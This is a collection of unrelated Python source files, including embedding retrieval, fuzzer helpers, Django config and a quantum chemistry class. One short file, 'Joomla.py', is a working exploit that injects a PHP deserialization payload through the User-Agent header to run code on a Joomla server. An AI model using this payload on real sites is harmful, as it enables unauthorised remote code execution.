        """Refresh expiry for *key*. (optional; AttributeError if unsupported)"""
        raise AttributeError
def asyncio_binary_classifier(f):
    """Classify *f* for factory dispatch: 1 for coroutines, 0 otherwise."""
    return 1 if Callable(f).is_coroutine else 0
def create_factory_proxy(proxy_base, classifier, factory_table):
    """Build a FactoryProxy subclass bound to *classifier* and *factory_table*.

    The returned class borrows ``__call__`` metadata (name, docstring) from
    the first factory so it introspects like that factory.
    """
    sample_factory = factory_table[0]
    proxy_class = type(
        'ring.create_factory_proxy.<locals>._FactoryProxy', (proxy_base,), {})
    proxy_class.classifier = staticmethod(classifier)
    proxy_class.factory_table = staticmethod(factory_table)
    # Copy the sample factory's metadata onto __call__ for nicer help()/repr.
    proxy_class.__call__ = functools.wraps(sample_factory)(proxy_class.__call__)
    proxy_class.__doc__ = sample_factory.__doc__
    return proxy_class
class FactoryProxyMetaclass(type):
    """Metaclass giving factory-proxy classes an informative repr."""

    def __repr__(cls):
        body = ', '.join(
            '{i}: {factory.__module__}.{factory.__name__}'.format(
                i=i, factory=factory)
            for i, factory in enumerate(cls.factory_table))
        template = '<{cls.__base__.__name__} subclass with (' \
            'factory_table={factory_table}, ' \
            'classifier={cls.classifier.__module__}.{classifier})>'
        return template.format(
            cls=cls,
            factory_table='{' + body + '}',
            classifier=qualname(cls.classifier))
class FactoryProxyBase(six.with_metaclass(FactoryProxyMetaclass, object)):
    """Dispatching proxy over a table of ring factories.

    ``classifier(func)`` picks an index into ``factory_table``; the chosen
    factory is instantiated once with the arguments given to ``__init__``
    and the resulting ring decorator is cached per classification key.
    """

    classifier = None  # must be set in descendant
    factory_table = None  # must be set in descendant

    def __init__(self, *args, **kwargs):
        # Factory arguments are held until the first function of each
        # classification is decorated.
        self.pargs = args, kwargs
        self.rings = {}

    def __call__(self, func):
        """Decorate *func* with the ring matching its classification."""
        key = self.classifier(func)
        if key not in self.rings:
            factory = self.factory_table[key]
            args, kwargs = self.pargs
            ring = factory(*args, **kwargs)
            # Cache the *created ring*, not the factory: a later call with
            # the same key must reuse the configured decorator instead of
            # invoking the factory again with a bare function.
            self.rings[key] = ring
        else:
            ring = self.rings[key]
        return ring(func)

    def __repr__(self):
        return u'{cls.__name__}(*{args}, **{kwargs})'.format(
            cls=type(self),
            args=repr(self.pargs[0]), kwargs=repr(self.pargs[1]))
| 36.053039 | 106 | 0.648094 |
79553202bd943a3745bcce095b9a9a6b3e58c3a1 | 4,307 | py | Python | word_knn/nlpl_retriever.py | rom1504/word-knn | 56cb113a8f843eaafec6200ec5ed6e88876edf12 | [
"MIT"
] | 4 | 2019-08-26T11:52:23.000Z | 2020-08-10T17:52:40.000Z | word_knn/nlpl_retriever.py | rom1504/word-knn | 56cb113a8f843eaafec6200ec5ed6e88876edf12 | [
"MIT"
] | 5 | 2019-08-26T00:20:36.000Z | 2020-08-10T12:37:51.000Z | word_knn/nlpl_retriever.py | rom1504/word-knn | 56cb113a8f843eaafec6200ec5ed6e88876edf12 | [
"MIT"
] | 1 | 2020-10-08T20:56:14.000Z | 2020-10-08T20:56:14.000Z | import numpy as np
import os.path
import os
from io import BytesIO
from zipfile import ZipFile
from urllib.request import urlopen
from word_knn.closest_words import inverse_dict
from word_knn.closest_words import ClosestWords
from word_knn.closest_words import build_knn_index
from pathlib import Path
home = str(Path.home())
def csv_to_embeddings_and_dict(input_file):
    """Parse a word2vec-style text file or stream.

    Returns a tuple ``(embeddings, id_to_word, word_to_id)`` where
    *embeddings* is a float32 matrix with one row per vocabulary entry.
    """
    index_to_word = {}

    def token_values(lines):
        # The first row is a header (vocab size / dimension); skip it.
        next(lines)
        for row_index, raw in enumerate(lines):
            if not isinstance(raw, str):
                raw = raw.decode("utf-8", "ignore")
            fields = raw.rstrip().split(" ")
            word = fields[0].split("_")[0]
            index_to_word[row_index] = word.replace("::", " ")
            fields.pop(0)
            for field in fields:
                yield float(field)
            # Remember the vector width so the flat array can be reshaped.
            csv_to_embeddings_and_dict.rowlength = len(fields)

    def all_values():
        csv_to_embeddings_and_dict.rowlength = 0
        if isinstance(input_file, str):
            with open(input_file, "r") as infile:
                yield from token_values(infile)
        else:
            yield from token_values(input_file)

    flat = np.fromiter(all_values(), dtype=float)
    embeddings = flat.reshape((-1, csv_to_embeddings_and_dict.rowlength)).astype(np.float32)
    return embeddings, index_to_word, inverse_dict(index_to_word)
def csv_to_dict(input_file):
    """Parse only the vocabulary of a word2vec-style text file or stream.

    Returns ``(id_to_word, word_to_id)`` dictionaries.
    """
    index_to_word = {}

    def read(lines):
        next(lines)  # skip the header row
        for i, line in enumerate(lines):
            word = line.rstrip().split("_")[0]
            index_to_word[i] = word.replace("::", " ")

    if isinstance(input_file, str):
        with open(input_file, "r") as infile:
            read(infile)
    else:
        read(input_file)
    return index_to_word, inverse_dict(index_to_word)
def sizeof_fmt(num, suffix="B"):
    """Format a byte count as a human-readable binary-prefixed string."""
    for prefix in ("", "Ki", "Mi", "Gi", "Ti", "Pi", "Ei", "Zi"):
        if abs(num) < 1024.0:
            return f"{num:3.1f}{prefix}{suffix}"
        num /= 1024.0
    return f"{num:.1f}Yi{suffix}"
def from_csv(input_file, keep_embeddings=True):
    """Build a ClosestWords index from a word2vec-style file or stream."""
    embeddings, word_dict, inverse_word_dict = csv_to_embeddings_and_dict(input_file)
    knn_index = build_knn_index(embeddings)
    return ClosestWords(
        embeddings if keep_embeddings else None,
        inverse_word_dict, word_dict, knn_index)
def from_csv_or_cache(word_embedding_dir, input_file=None, keep_embeddings=False):
    """Load a cached ClosestWords index, or build one from CSV and cache it."""
    if input_file is None:
        input_file = word_embedding_dir + "/model.txt"
    cache_marker = word_embedding_dir + "/word_dict.pkl"
    if os.path.exists(cache_marker):
        return ClosestWords.from_disk_cache(word_embedding_dir)
    result = from_csv(input_file, True)
    result.cache_to_disk(word_embedding_dir)
    if not keep_embeddings:
        del result.embeddings
    return result
def from_nlpl(root_word_embedding_dir=home + "/embeddings", embedding_id="0", save_zip=False, keep_embeddings=False):
    """Download (if needed) an NLPL-repository embedding and build the index.

    Downloads ``http://vectors.nlpl.eu/repository/11/<id>.zip`` on first use,
    extracts ``model.txt`` and builds/loads a ClosestWords index, caching it
    under ``<root>/<id>``.
    """
    word_embedding_dir = root_word_embedding_dir + "/" + embedding_id
    if not os.path.exists(word_embedding_dir):
        os.makedirs(word_embedding_dir)
    # Fast path: a previously built disk cache exists.
    if os.path.exists(word_embedding_dir + "/word_dict.pkl"):
        return ClosestWords.from_disk_cache(word_embedding_dir, keep_embeddings)
    zip_file_path = word_embedding_dir + "/model.zip"
    if not os.path.exists(word_embedding_dir + "/model.txt"):
        if os.path.exists(zip_file_path):
            # Reuse a previously saved archive.
            zipfile = ZipFile(zip_file_path, "r")
        else:
            url = "http://vectors.nlpl.eu/repository/11/" + embedding_id + ".zip"
            resp = urlopen(url)
            length = resp.getheader("content-length")
            print("Downloading " + url + " (" + sizeof_fmt(int(length)) + ")")
            content = resp.read()
            del resp
            if save_zip:
                file = open(word_embedding_dir + "/model.zip", "wb")
                file.write(content)
                file.close()
            the_bytes = BytesIO(content)
            zipfile = ZipFile(the_bytes)
            # Release the raw download buffer promptly (models can be large).
            del content
            del the_bytes
        zipfile.extract("model.txt", word_embedding_dir)
        zipfile.close()
    return from_csv_or_cache(word_embedding_dir, open(word_embedding_dir + "/model.txt", "rb"), keep_embeddings)
| 33.913386 | 117 | 0.634781 |
795532ff7863d1dba1002c4c2018f001506c65cc | 5,653 | py | Python | testcase_helpers.py | freingruber/JavaScript-Raider | d1c1fff2fcfc60f210b93dbe063216fa1a83c1d0 | [
"Apache-2.0"
] | 91 | 2022-01-24T07:32:34.000Z | 2022-03-31T23:37:15.000Z | testcase_helpers.py | zeusguy/JavaScript-Raider | d1c1fff2fcfc60f210b93dbe063216fa1a83c1d0 | [
"Apache-2.0"
] | null | null | null | testcase_helpers.py | zeusguy/JavaScript-Raider | d1c1fff2fcfc60f210b93dbe063216fa1a83c1d0 | [
"Apache-2.0"
] | 11 | 2022-01-24T14:21:12.000Z | 2022-03-31T23:37:23.000Z | # Copyright 2022 @ReneFreingruber
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import native_code.speed_optimized_functions as speed_optimized_functions
def get_first_codeline_which_contains_token(content, token):
    """Return the first (stripped) line of *content* containing *token*.

    Returns None when no line contains the token.
    """
    matches = (line.strip() for line in content.split("\n") if token in line)
    return next(matches, None)
# Line numbers start at 0 (and not at 1)!
# So line_number 1 means line 2
def content_offset_to_line_number(lines, offset):
    """Map a character *offset* into the joined content back to a 0-based line.

    *lines* is the content already split on newlines; an offset falling on a
    line's terminating newline is attributed to that line. Returns None for
    offsets past the end (should not happen for valid input).
    """
    start = 0
    for lineno, line in enumerate(lines):
        end = start + len(line)
        if offset <= end:
            return lineno
        start = end + 1  # +1 accounts for the newline separator
    return None
# If a testcase has "var_1_" and "var_3_" but no "var_2_"
# This function will rename all "var_3_" occurrences to "var_2_"
def ensure_all_variable_names_are_contiguous(code):
    """Renumber "var_N_" tokens in *code* so their IDs are contiguous from 1."""
    return _ensure_all_token_names_are_contiguous("var_%d_", code)
def ensure_all_function_names_are_contiguous(code):
    """Renumber "func_N_" tokens in *code* so their IDs are contiguous from 1."""
    return _ensure_all_token_names_are_contiguous("func_%d_", code)
def ensure_all_class_names_are_contiguous(code):
    """Renumber "cl_N_" tokens in *code* so their IDs are contiguous from 1."""
    return _ensure_all_token_names_are_contiguous("cl_%d_", code)
def _ensure_all_token_names_are_contiguous(token, code):
max_number_of_variables = 1000 # assuming that all testcases have less than 1000 variable names
variable_in_use = [False] * max_number_of_variables
next_token_id = 1
# Check which tokens are in-use
for idx in range(max_number_of_variables):
variable_id = idx + 1
token_name = token % idx
if token_name in code:
new_token_name = token % next_token_id
next_token_id += 1
if new_token_name == token_name:
pass # nothing to do
else:
# they are different, e.g. token_name has a higher token ID, so change it
code = code.replace(token_name, new_token_name)
return code
def get_highest_variable_token_id(code):
    """Return one past the highest "var_<idx>_" index found in *code* (min 1).

    NOTE(review): the scanned token uses ``idx`` but the stored value is
    ``idx + 1``, i.e. for "var_5_" this returns 6. That looks like an
    off-by-one relative to the token naming in
    _ensure_all_token_names_are_contiguous -- confirm against callers
    whether "next free ID" is the intended meaning before changing it.
    """
    max_number_of_variables = 1000  # assuming that all testcases have less than 1000 variable names
    highest = 1
    for idx in range(max_number_of_variables):
        variable_id = idx + 1
        token_name = "var_%d_" % idx
        if token_name in code:
            highest = variable_id
    return highest
def remove_numbers_from_testcase(code):
    """Return *code* with every ASCII decimal digit (0-9) deleted."""
    return code.translate(str.maketrans("", "", "0123456789"))
def remove_strings_from_testcase(code):
    """Empty the contents of every "-, '- and `-quoted string in *code*.

    The quote characters themselves are kept, only the text between each
    matching pair is dropped. Quote types are tried in the fixed order
    ", ', ` on every pass, mirroring the original per-type handling. If a
    quote type has an unmatched opening symbol (odd count), the original
    code is returned unchanged, since that usually indicates a flaw in an
    earlier testcase-rewriting step.
    """
    original_code = code
    fixed_code = ""
    while True:
        for quote in ('"', "'", '`'):
            idx = speed_optimized_functions.get_index_of_next_symbol_not_within_string(code, quote)
            if idx == -1:
                continue  # no (further) string of this quote type
            part1 = code[:idx + 1]  # everything up to and including the opening quote
            rest = code[idx + 1:]
            idx2 = speed_optimized_functions.get_index_of_next_symbol_not_within_string(rest, quote)
            if idx2 == -1:
                # Unbalanced quotes; bail out with the untouched input.
                return original_code
            # Keep the opening quote and emit a closing quote with no content.
            fixed_code += part1 + quote
            code = rest[idx2 + 1:]
            break  # restart the scan on the remaining code
        else:
            break  # no string of any quote type left
    return fixed_code + code
79553365ec6009dc4c9b0a3d048c144940716e6f | 552 | py | Python | follow/migrations/0003_alter_follow_created_alter_request_created.py | CMPUT404W22AMNRY/CMPUT404-project-socialdistribution | 61d5c8aa2c7f038c137fc86c8b194d92a33d90e3 | [
"W3C-20150513"
] | 1 | 2022-01-14T04:37:54.000Z | 2022-01-14T04:37:54.000Z | follow/migrations/0003_alter_follow_created_alter_request_created.py | CMPUT404W22AMNRY/CMPUT404-project-socialdistribution | 61d5c8aa2c7f038c137fc86c8b194d92a33d90e3 | [
"W3C-20150513"
] | 88 | 2022-02-19T00:16:44.000Z | 2022-03-29T03:05:08.000Z | follow/migrations/0003_alter_follow_created_alter_request_created.py | CMPUT404W22AMNRY/CMPUT404-project-socialdistribution | 61d5c8aa2c7f038c137fc86c8b194d92a33d90e3 | [
"W3C-20150513"
] | null | null | null | # Generated by Django 4.0.2 on 2022-03-04 18:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('follow', '0002_request_title'),
]
operations = [
migrations.AlterField(
model_name='follow',
name='created',
field=models.DateTimeField(auto_now_add=True),
),
migrations.AlterField(
model_name='request',
name='created',
field=models.DateTimeField(auto_now_add=True),
),
]
| 23 | 58 | 0.583333 |
795534b194f33c2421c3754ea55c88ae749e12ae | 631 | py | Python | lib/celcius/unix/commands/rm.py | claymcleod/celcius | e46a3c1ba112af9de23360d1455ab1e037a38ea1 | [
"MIT"
] | 4 | 2016-01-15T22:34:24.000Z | 2016-06-02T06:38:47.000Z | lib/celcius/unix/commands/rm.py | claymcleod/celcius | e46a3c1ba112af9de23360d1455ab1e037a38ea1 | [
"MIT"
] | null | null | null | lib/celcius/unix/commands/rm.py | claymcleod/celcius | e46a3c1ba112af9de23360d1455ab1e037a38ea1 | [
"MIT"
] | null | null | null | class rm(object):
"""Class for wrapping UNIX 'rm' command"""
basecommand = 'rm'
def __init__(self, filename=''):
self.options = []
self.filename = filename
def add_option(self, option):
self.options.append(option)
def build_command(self):
command_bits = []
command_bits.append(self.basecommand)
if self.options != []:
command_bits.append(' '.join(self.options))
command_bits.append(self.filename)
return ' '.join(command_bits)
def build_force_rm_command(filename):
    """Return an ``rm`` builder preconfigured with ``-f`` for *filename*."""
    command = rm(filename)
    command.add_option("-f")
    return command
| 23.37037 | 55 | 0.613312 |
795534fbbc8d1fff9e0542ea332b16b8a748273b | 1,023 | py | Python | awarding/urls.py | amtesire/Project-Awards | 3728e3b5d9c1a89949101bef301fdd9b51d4fd7e | [
"MIT"
] | null | null | null | awarding/urls.py | amtesire/Project-Awards | 3728e3b5d9c1a89949101bef301fdd9b51d4fd7e | [
"MIT"
] | null | null | null | awarding/urls.py | amtesire/Project-Awards | 3728e3b5d9c1a89949101bef301fdd9b51d4fd7e | [
"MIT"
] | null | null | null | """awarding URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url,include
from django.contrib import admin
from django.contrib.auth import views
# URL routing table: maps request paths to views / included URLconfs.
urlpatterns = [
    # Django admin site.
    url(r'^admin/', admin.site.urls),
    # Main application routes (project-local `award` app), mounted at root.
    url(r'',include('award.urls')),
    # django-registration (simple backend) authentication flows.
    url(r'^accounts/', include('registration.backends.simple.urls')),
    #url(r'^logout/$', views.logout, {"next_page": '/'}),
    # TinyMCE rich-text editor endpoints.
    url(r'^tinymce/', include('tinymce.urls')),
]
| 37.888889 | 79 | 0.690127 |
795534fc82f354ea40d5f086736721253f2d64b3 | 3,444 | py | Python | sling/nlp/parser/tools/viewmodel.py | SasCezar/sling | 809e21a9986d2522d5014b5836ba222498c099a2 | [
"Apache-2.0"
] | null | null | null | sling/nlp/parser/tools/viewmodel.py | SasCezar/sling | 809e21a9986d2522d5014b5836ba222498c099a2 | [
"Apache-2.0"
] | null | null | null | sling/nlp/parser/tools/viewmodel.py | SasCezar/sling | 809e21a9986d2522d5014b5836ba222498c099a2 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# Utility to inspect and print training details saved in a flow file.
import os
import pickle
import sling
import sling.flags as flags
import sling.myelin.flow as flow
import sys
# Needed by pickle to load the data back.
sys.path.insert(0, 'sling/nlp/parser/trainer')
import trainer as trainer
# Prints evaluation metrics.
def print_metrics(header, metrics):
print "\n", header, "metrics"
print "-" * (len(header) + len("metrics") + 1)
for metric in ['SPAN', 'FRAME', 'TYPE', 'ROLE', 'SLOT']:
for name in ['Precision', 'Recall', 'F1']:
key = metric + "_" + name
print " %s: %f" % (key, metrics[key])
print
if __name__ == '__main__':
  # Command-line flags controlling which inspection actions run.
  flags.define('--flow',
               help='Flow file',
               default='',
               type=str,
               metavar='FLOW')
  flags.define('--strip',
               help='Output flow file which drops "dev" blobs',
               default='',
               type=str,
               metavar='FLOW')
  flags.define('--training_details',
               help='Print training details or not',
               default=False,
               action='store_true')
  flags.define('--output_commons',
               help='Output file to store commons',
               default='',
               type=str,
               metavar='FILE')
  flags.parse()
  assert os.path.exists(flags.arg.flow), flags.arg.flow

  # Load the Myelin flow file to inspect.
  f = flow.Flow()
  f.load(flags.arg.flow)

  if flags.arg.training_details:
    # The trainer stores a pickled dict of hyperparams, losses and
    # per-checkpoint evaluation metrics in the 'training_details' blob.
    details = f.blobs.get('training_details', None)
    if not details:
      print 'No training details in the flow file.'
    else:
      dictionary = pickle.loads(details.data)
      print 'Hyperparams:\n', dictionary['hyperparams'], '\n'
      print 'Number of examples seen:', dictionary['num_examples_seen']
      (final_loss, final_count) = dictionary['losses'][-1]['total']
      print 'Final loss', (final_loss / final_count)
      metrics = dictionary['checkpoint_metrics']
      # Pick the checkpoint with the best SLOT_F1 score.
      slot_f1 = [metric["SLOT_F1"] for metric in metrics]
      best_index = max(enumerate(slot_f1), key=lambda x:x[1])[0]
      if best_index == len(slot_f1) - 1:
        print_metrics('Best (= final)', metrics[best_index])
      else:
        print_metrics('Final', metrics[-1])
        print_metrics('Best', metrics[best_index])

  if flags.arg.output_commons:
    # Dump the raw commons store bytes to the requested file.
    data = f.blobs['commons'].data
    with open(flags.arg.output_commons, 'wb') as outfile:
      outfile.write(data)
    print len(data), 'bytes written to', flags.arg.output_commons

  if flags.arg.strip:
    # Drop all blobs tagged with a 'dev' attribute and save a slimmed flow.
    count = 0
    for name in list(f.blobs.keys()):
      blob = f.blobs[name]
      if 'dev' in blob.attrs:
        f.blobs.pop(name)
        count += 1
    f.save(flags.arg.strip)
    print count, 'blobs removed, flow output to', flags.arg.strip
| 33.115385 | 80 | 0.618757 |
795536438222ae6349b72511ed5dbd270a198659 | 234 | py | Python | Code/Python-Current/Support/SupportUtils.py | Coltonton/Custom-Car-Dashboard | 7719cf806e471857ae451ff030236ca57f5e76ce | [
"MIT"
] | 3 | 2021-07-22T09:45:56.000Z | 2022-01-05T09:09:53.000Z | Code/Python-Current/Support/SupportUtils.py | Coltonton/Custom-Car-Dashboard | 7719cf806e471857ae451ff030236ca57f5e76ce | [
"MIT"
] | null | null | null | Code/Python-Current/Support/SupportUtils.py | Coltonton/Custom-Car-Dashboard | 7719cf806e471857ae451ff030236ca57f5e76ce | [
"MIT"
] | null | null | null | from datetime import datetime
debugMSGs = 1
def printDebug(msg):
if debugMSGs == 1:
now = datetime.now()
debugtime = now.strftime("%m/%d %I:%M.%S")
print("[{}]: {}".format(debugtime, msg))#] #Debug Msg () | 26 | 64 | 0.57265 |
7955364c4a6740566ce23c36f3de7f2ee660f6aa | 949 | py | Python | Joomla/验证Joomla是否存在反序列化漏洞的脚本/Joomla.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 11 | 2020-05-30T13:53:49.000Z | 2021-03-17T03:20:59.000Z | Joomla/验证Joomla是否存在反序列化漏洞的脚本/Joomla.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-13T03:25:18.000Z | 2020-07-21T06:24:16.000Z | Joomla/验证Joomla是否存在反序列化漏洞的脚本/Joomla.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-30T13:53:51.000Z | 2020-12-01T21:44:26.000Z | #!/usr/bin/python
# coding=utf-8
# author:KuuKi
#python joomla.py http://example.com/
import urllib2
import cookielib,sys
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
urllib2.socket.setdefaulttimeout(10)
ua = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86'
req = urllib2.Request(url=sys.argv[1],headers={'User-Agent':ua})
opener.open(req)
req = urllib2.Request(url=sys.argv[1])
if 'SERVER["REMOTE_ADDR"]' in opener.open(req).read():
print "vulnerable!" | 49.947368 | 450 | 0.710221 |
7955376f507937ae76a45faeefcd8afd6477d70f | 22,630 | py | Python | kelvin/ueg_scf_system.py | MoleOrbitalHybridAnalyst/kelvin | 99538f8360975e2f80941446d8fbf2e848f74cf9 | [
"MIT"
] | null | null | null | kelvin/ueg_scf_system.py | MoleOrbitalHybridAnalyst/kelvin | 99538f8360975e2f80941446d8fbf2e848f74cf9 | [
"MIT"
] | null | null | null | kelvin/ueg_scf_system.py | MoleOrbitalHybridAnalyst/kelvin | 99538f8360975e2f80941446d8fbf2e848f74cf9 | [
"MIT"
] | null | null | null | import logging
import numpy
from pyscf import lib
from cqcpy import ft_utils
from cqcpy.ov_blocks import one_e_blocks
from cqcpy.ov_blocks import two_e_blocks
from cqcpy.ov_blocks import two_e_blocks_full
from .system import System
from .ueg_utils import UEGBasis
# Module-wide tensor-contraction function: use pyscf's lib.einsum.
einsum = lib.einsum
#einsum = einsum
class UEGSCFSystem(System):
    """The uniform electron gas in a plane-wave basis set.

    Attributes:
        T (float): Temperature.
        L (float): Box-length.
        basis: UEG plane-wave basis set.
        mu (float): Chemical potential.
        Na (float): Number of alpha electrons.
        Nb (float): Number of beta electrons.
        N (float): Total number of electrons.
        den (float): Number density.
        rs (float): Wigner-Seitz radius.
        Ef (float): Fermi-energy (of non-interacting system).
        Tf (float): Reduced temperature.
    """
    def __init__(self, T, L, Emax, mu=None, na=None, nb=None,
                 norb=None, orbtype='u', madelung=None, naref=None):
        self.T = T
        self.L = L
        self.basis = UEGBasis(L, Emax, norb=norb)
        # compute mu if N is specified
        if na is not None:
            self.Na = na
            self.Nb = nb
            assert(na > 0)
            assert(nb > 0)
            # place mu just above the highest occupied level (zero-T only)
            mua = self.basis.Es[self.Na - 1] + 0.00001
            mub = self.basis.Es[self.Nb - 1] + 0.00001
            assert(mua == mub)
            self.mu = mua
            assert(self.T == 0.0)
        else:
            assert(nb is None)
            assert(mu is not None)
            self.mu = mu
        # store orbital occupations as numpy index arrays
        d0 = numpy.asarray(self.basis.Es)
        n = d0.shape[0]
        if naref is not None:
            # explicit reference: first naref spatial orbitals are occupied
            occ = [i for i in range(naref)]
            vir = [i + naref for i in range(n - naref)]
            self.oidx = numpy.r_[occ]
            self.vidx = numpy.r_[vir]
        else:
            occ = []
            vir = []
            for p, d in enumerate(d0):
                if d < self.mu:
                    occ.append(p)
                if d > self.mu:
                    vir.append(p)
            self.oidx = numpy.r_[occ]
            self.vidx = numpy.r_[vir]
        # spin-orbital (general) index lists: beta block is offset by n
        for p, d in enumerate(d0):
            if d < self.mu:
                occ.append(p + n)
            if d > self.mu:
                vir.append(p + n)
        self.goidx = numpy.r_[occ]
        self.gvidx = numpy.r_[vir]
        # now get real (thermal) occupations if necessary
        if na is None:
            assert(nb is None)
            en = self.g_energies_tot()
            beta = 1.0 / self.T if self.T > 0.0 else 1.0e20
            fo = ft_utils.ff(beta, en, self.mu)
            N = fo.sum()
            self.Na = N/2.0
            self.Nb = self.Na
        # save some parameters
        self.N = self.Na + self.Nb
        self.den = self.N/(L*L*L)
        self.rs = (3/(4.0*numpy.pi*self.den))**(1.0/3.0)
        pi2 = numpy.pi*numpy.pi
        self.Ef = 0.5*(3.0*pi2*self.den)**(2.0/3.0)
        self.Tf = self.T / self.Ef
        self.orbtype = orbtype
        self.madelung = madelung
        # Madelung constant for a cubic cell of side L
        self._mconst = 2.837297479 / (2*self.L)

    def has_g(self):
        """Return True: general (spin-orbital) integrals are available."""
        return True

    def has_u(self):
        """Return True unless only general orbitals are requested."""
        return (False if self.orbtype == 'g' else True)

    def has_r(self):
        """Return True only for restricted orbitals."""
        return (True if self.orbtype == 'r' else False)

    def verify(self, T, mu):
        """Check that (T, mu) match this system (mu is ignored at zero T)."""
        if T > 0.0:
            s = T == self.T and mu == self.mu
        else:
            s = T == self.T
        if not s:
            return False
        else:
            return True

    def const_energy(self):
        """Constant energy shift (Madelung correction if requested)."""
        if self.madelung == 'const':
            return -(self.Na + self.Nb)*self._mconst
        else:
            return 0.0

    def get_mp1(self):
        """Return the first-order (MP1) correction to the energy."""
        if self.has_u():
            if self.T > 0:
                Va, Vb, Vabab = self.u_aint_tot()
                beta = 1.0 / self.T
                ea, eb = self.u_energies_tot()
                foa = ft_utils.ff(beta, ea, self.mu)
                fob = ft_utils.ff(beta, eb, self.mu)
                tmat = self.r_hcore()
                E1_1 = einsum('ii,i->', tmat - numpy.diag(ea), foa)
                E1_1 += einsum('ii,i->', tmat - numpy.diag(eb), fob)
                E1_2 = 0.5*einsum('ijij,i,j->', Va, foa, foa)
                E1_2 += 0.5*einsum('ijij,i,j->', Vb, fob, fob)
                E1_2 += einsum('ijij,i,j->', Vabab, foa, fob)
                return E1_2 + E1_1
            else:
                Va, Vb, Vabab = self.u_aint()
                E1 = -0.5*numpy.einsum('ijij->', Va.oooo)
                E1 -= 0.5*numpy.einsum('ijij->', Vb.oooo)
                E1 -= numpy.einsum('ijij->', Vabab.oooo)
                return E1
        else:
            if self.T > 0:
                V = self.g_aint_tot()
                beta = 1.0 / self.T
                en = self.g_energies_tot()
                tmat = self.g_hcore()
                fo = ft_utils.ff(beta, en, self.mu)
                E1_1 = einsum('ii,i->', tmat - numpy.diag(en), fo)
                E1_2 = 0.5*einsum('ijij,i,j->', V, fo, fo)
                return E1_2 + E1_1
            else:
                V = self.g_aint()
                return -0.5*einsum('ijij->', V.oooo)

    def u_d_mp1(self, dveca, dvecb):
        """Derivative of the MP1 energy along occupation perturbations
        (dveca, dvecb) in the unrestricted representation."""
        if self.T > 0:
            Va, Vb, Vabab = self.u_aint_tot()
            beta = 1.0 / self.T
            ea, eb = self.u_energies_tot()
            foa = ft_utils.ff(beta, ea, self.mu)
            fva = ft_utils.ffv(beta, ea, self.mu)
            veca = dveca*foa*fva
            fob = ft_utils.ff(beta, eb, self.mu)
            fvb = ft_utils.ffv(beta, eb, self.mu)
            vecb = dvecb*fob*fvb
            tmat = self.r_hcore()
            D = -einsum('ii,i->', tmat - numpy.diag(ea), veca)
            D += -einsum('ii,i->', tmat - numpy.diag(eb), vecb)
            D += -einsum('ijij,i,j->', Va, veca, foa)
            D += -einsum('ijij,i,j->', Vb, vecb, fob)
            D += -einsum('ijij,i,j->', Vabab, veca, fob)
            D += -einsum('ijij,i,j->', Vabab, foa, vecb)
            return D
        else:
            # bug fix: message said "OK" instead of "0K" (zero kelvin)
            logging.warning("Derivative of MP1 energy is zero at 0K")
            return 0.0

    def u_mp1_den(self):
        """Orbital-resolved derivative of the MP1 energy (unrestricted)."""
        if self.T > 0:
            Va, Vb, Vabab = self.u_aint_tot()
            beta = 1.0 / self.T
            ea, eb = self.u_energies_tot()
            foa = ft_utils.ff(beta, ea, self.mu)
            fva = ft_utils.ffv(beta, ea, self.mu)
            veca = foa*fva
            fob = ft_utils.ff(beta, eb, self.mu)
            fvb = ft_utils.ffv(beta, eb, self.mu)
            vecb = fob*fvb
            tmat = self.r_hcore()
            Da = -beta*einsum('ii,i->i', tmat - numpy.diag(ea), veca)
            Db = -beta*einsum('ii,i->i', tmat - numpy.diag(eb), vecb)
            Da += -beta*einsum('ijij,i,j->i', Va, veca, foa)
            Db += -beta*einsum('ijij,i,j->i', Vb, vecb, fob)
            Da += -beta*einsum('ijij,i,j->i', Vabab, veca, fob)
            Db += -beta*einsum('ijij,i,j->j', Vabab, foa, vecb)
            return Da, Db
        else:
            logging.warning("Derivative of MP1 energy is zero at 0K")
            return 0.0

    def g_d_mp1(self, dvec):
        """Derivative of the MP1 energy along dvec (general orbitals)."""
        if self.T > 0:
            V = self.g_aint_tot()
            beta = 1.0 / self.T
            en = self.g_energies_tot()
